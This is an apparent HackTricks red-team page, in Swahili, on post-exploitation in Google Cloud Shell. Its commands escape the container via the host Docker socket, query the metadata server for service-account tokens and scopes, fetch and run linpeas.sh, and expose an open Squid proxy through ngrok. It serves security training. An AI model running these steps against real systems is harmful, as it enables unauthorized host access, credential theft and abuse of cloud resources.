GCP - Cloud Shell Post Exploitation

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cloud Shell

Kwa maelezo zaidi kuhusu Cloud Shell angalia:

GCP - Cloud Shell Enum

Container Escape

Kumbuka kwamba Google Cloud Shell inafanya kazi ndani ya kontena, unaweza kwa urahisi kutoroka hadi mwenyeji kwa kufanya:

bash
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Hii haitambuliki kama udhaifu na google, lakini inakupa mtazamo mpana wa kinachoendelea katika mazingira hayo.

Zaidi ya hayo, tambua kwamba kutoka kwa mwenyeji unaweza kupata tokeni ya akaunti ya huduma:

bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Na mipaka ifuatayo:

bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Hesabu metadata kwa kutumia LinPEAS:

bash
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

Baada ya kutumia https://github.com/carlospolop/bf_my_gcp_permissions na token ya Akaunti ya Huduma hakuna ruhusa iliyo gundulika...

Tumia kama Proxy

Ikiwa unataka kutumia mfano wako wa google cloud shell kama proxy unahitaji kukimbia amri zifuatazo (au ziweke kwenye faili .bashrc):

bash
sudo apt install -y squid

Tuju tu kukujulisha kwamba Squid ni seva ya proxy ya http. Unda faili ya squid.conf yenye mipangilio ifuatayo:

bash
http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

nakala ya squid.conf faili kwenye /etc/squid

bash
sudo cp squid.conf /etc/squid

Hatimaye endesha huduma ya squid:

bash
sudo service squid start

Tumia ngrok kuruhusu proxy ipatikane kutoka nje:

bash
./ngrok tcp 3128

Baada ya kukimbia nakala ya tcp:// url. Ikiwa unataka kukimbia proxy kutoka kwa kivinjari, inapendekezwa kuondoa sehemu ya tcp:// na bandari na kuweka bandari katika uwanja wa bandari wa mipangilio ya proxy ya kivinjari chako (squid ni seva ya proxy ya http).

Kwa matumizi bora wakati wa kuanzisha, faili ya .bashrc inapaswa kuwa na mistari ifuatayo:

bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

Maagizo yalikuwa yamekopwa kutoka https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Angalia ukurasa huo kwa mawazo mengine ya ajabu ya kuendesha aina yoyote ya programu (mifumo ya data na hata windows) katika Cloud Shell.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks